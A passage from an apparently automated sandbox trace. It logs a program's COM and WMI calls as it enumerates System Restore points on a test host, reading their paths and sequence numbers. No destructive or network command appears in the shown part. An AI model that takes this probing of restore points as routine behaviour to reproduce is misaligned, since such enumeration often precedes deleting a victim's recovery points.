puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.610] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.610] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.610] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.610] IWbemClassObject:Get (in: This=0x6737180, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3528c4c*=0, plFlavor=0x3528c50*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), pType=0x3528c4c*=19, plFlavor=0x3528c50*=0) returned 0x0 [0116.610] IWbemClassObject:Get (in: This=0x6737180, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3528c4c*=19, plFlavor=0x3528c50*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), pType=0x3528c4c*=19, plFlavor=0x3528c50*=0) returned 0x0 [0116.610] CoTaskMemAlloc (cb=0x4) returned 0x77dc48 [0116.610] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77dc48, puReturned=0x3526b58 | out: apObjects=0x77dc48*=0x6737800, puReturned=0x3526b58*=0x1) returned 0x0 [0116.611] IUnknown:QueryInterface (in: This=0x6737800, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6737800) returned 0x0 [0116.611] IUnknown:QueryInterface (in: This=0x6737800, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.611] IUnknown:QueryInterface (in: This=0x6737800, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.611] IUnknown:AddRef (This=0x6737800) returned 0x3 [0116.611] IUnknown:QueryInterface (in: This=0x6737800, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.611] IUnknown:QueryInterface (in: This=0x6737800, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.611] IUnknown:QueryInterface (in: This=0x6737800, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6737804) returned 0x0 [0116.611] IMarshal:GetUnmarshalClass (in: This=0x6737804, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.611] IUnknown:Release (This=0x6737804) returned 0x3 [0116.611] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.611] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.611] IUnknown:QueryInterface (in: This=0x6737800, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.612] IUnknown:Release (This=0x6737800) returned 0x2 [0116.612] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.612] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.612] IUnknown:QueryInterface (in: This=0x6737800, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6737800) returned 0x0 [0116.612] IUnknown:AddRef (This=0x6737800) returned 0x4 [0116.612] IUnknown:Release (This=0x6737800) returned 0x3 [0116.612] IUnknown:Release (This=0x6737800) returned 0x2 [0116.612] CoTaskMemFree (pv=0x77dc48) [0116.612] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.612] IUnknown:AddRef (This=0x6737800) returned 0x3 [0116.612] IWbemClassObject:Get (in: This=0x6737800, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.612] IWbemClassObject:Get (in: This=0x6737800, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.612] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7") returned 0x6e [0116.612] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7") returned 0x6e [0116.612] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.612] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.612] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.612] IUnknown:Release (This=0x72015c) returned 0x1 [0116.613] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736db8) returned 0x0 [0116.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.613] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736db8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6737a68) returned 0x0 [0116.613] WbemDefPath:IUnknown:Release (This=0x6736db8) returned 0x0 [0116.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737a68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6737a68) returned 0x0 [0116.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737a68, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.614] WbemDefPath:IUnknown:AddRef (This=0x6737a68) returned 0x3 [0116.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737a68, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737a68, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737a68, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77dc48) returned 0x0 [0116.614] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.614] WbemDefPath:IUnknown:Release (This=0x77dc48) returned 0x3 [0116.614] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.614] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737a68, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.614] WbemDefPath:IUnknown:Release (This=0x6737a68) returned 0x2 [0116.614] WbemDefPath:IUnknown:Release (This=0x6737a68) returned 0x1 [0116.614] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.614] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737a68, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6737a68) returned 0x0 [0116.614] WbemDefPath:IUnknown:AddRef (This=0x6737a68) returned 0x3 [0116.614] WbemDefPath:IUnknown:Release (This=0x6737a68) returned 0x2 [0116.614] WbemDefPath:IWbemPath:SetText (This=0x6737a68, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7") returned 0x0 [0116.614] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.614] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.614] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.615] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.615] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.615] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.615] IWbemClassObject:Get (in: This=0x6737800, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3529494*=0, plFlavor=0x3529498*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), pType=0x3529494*=19, plFlavor=0x3529498*=0) returned 0x0 [0116.615] IWbemClassObject:Get (in: This=0x6737800, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3529494*=19, plFlavor=0x3529498*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), pType=0x3529494*=19, plFlavor=0x3529498*=0) returned 0x0 [0116.615] CoTaskMemAlloc (cb=0x4) returned 0x77dc88 [0116.615] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77dc88, puReturned=0x3526b58 | out: apObjects=0x77dc88*=0x6737b50, puReturned=0x3526b58*=0x1) returned 0x0 [0116.615] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6737b50) returned 0x0 [0116.616] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.616] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.616] IUnknown:AddRef (This=0x6737b50) returned 0x3 [0116.616] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.616] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.616] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6737b54) returned 0x0 [0116.616] IMarshal:GetUnmarshalClass (in: This=0x6737b54, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.616] IUnknown:Release (This=0x6737b54) returned 0x3 [0116.616] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.616] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.616] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.616] IUnknown:Release (This=0x6737b50) returned 0x2 [0116.616] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.616] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.616] IUnknown:QueryInterface (in: This=0x6737b50, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6737b50) returned 0x0 [0116.616] IUnknown:AddRef (This=0x6737b50) returned 0x4 [0116.616] IUnknown:Release (This=0x6737b50) returned 0x3 [0116.616] IUnknown:Release (This=0x6737b50) returned 0x2 [0116.616] CoTaskMemFree (pv=0x77dc88) [0116.616] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.616] IUnknown:AddRef (This=0x6737b50) returned 0x3 [0116.617] IWbemClassObject:Get (in: This=0x6737b50, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.617] IWbemClassObject:Get (in: This=0x6737b50, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.617] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8") returned 0x6e [0116.617] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8") returned 0x6e [0116.617] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.617] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.617] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.617] IUnknown:Release (This=0x72015c) returned 0x1 [0116.618] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736dc8) returned 0x0 [0116.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.618] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736dc8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6737dd0) returned 0x0 [0116.618] WbemDefPath:IUnknown:Release (This=0x6736dc8) returned 0x0 [0116.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6737dd0) returned 0x0 [0116.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.618] WbemDefPath:IUnknown:AddRef (This=0x6737dd0) returned 0x3 [0116.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77dc88) returned 0x0 [0116.618] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.618] WbemDefPath:IUnknown:Release (This=0x77dc88) returned 0x3 [0116.618] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.619] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.619] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x2 [0116.619] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x1 [0116.619] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.619] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6737dd0) returned 0x0 [0116.619] WbemDefPath:IUnknown:AddRef (This=0x6737dd0) returned 0x3 [0116.619] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x2 [0116.619] WbemDefPath:IWbemPath:SetText (This=0x6737dd0, uMode=0x4, 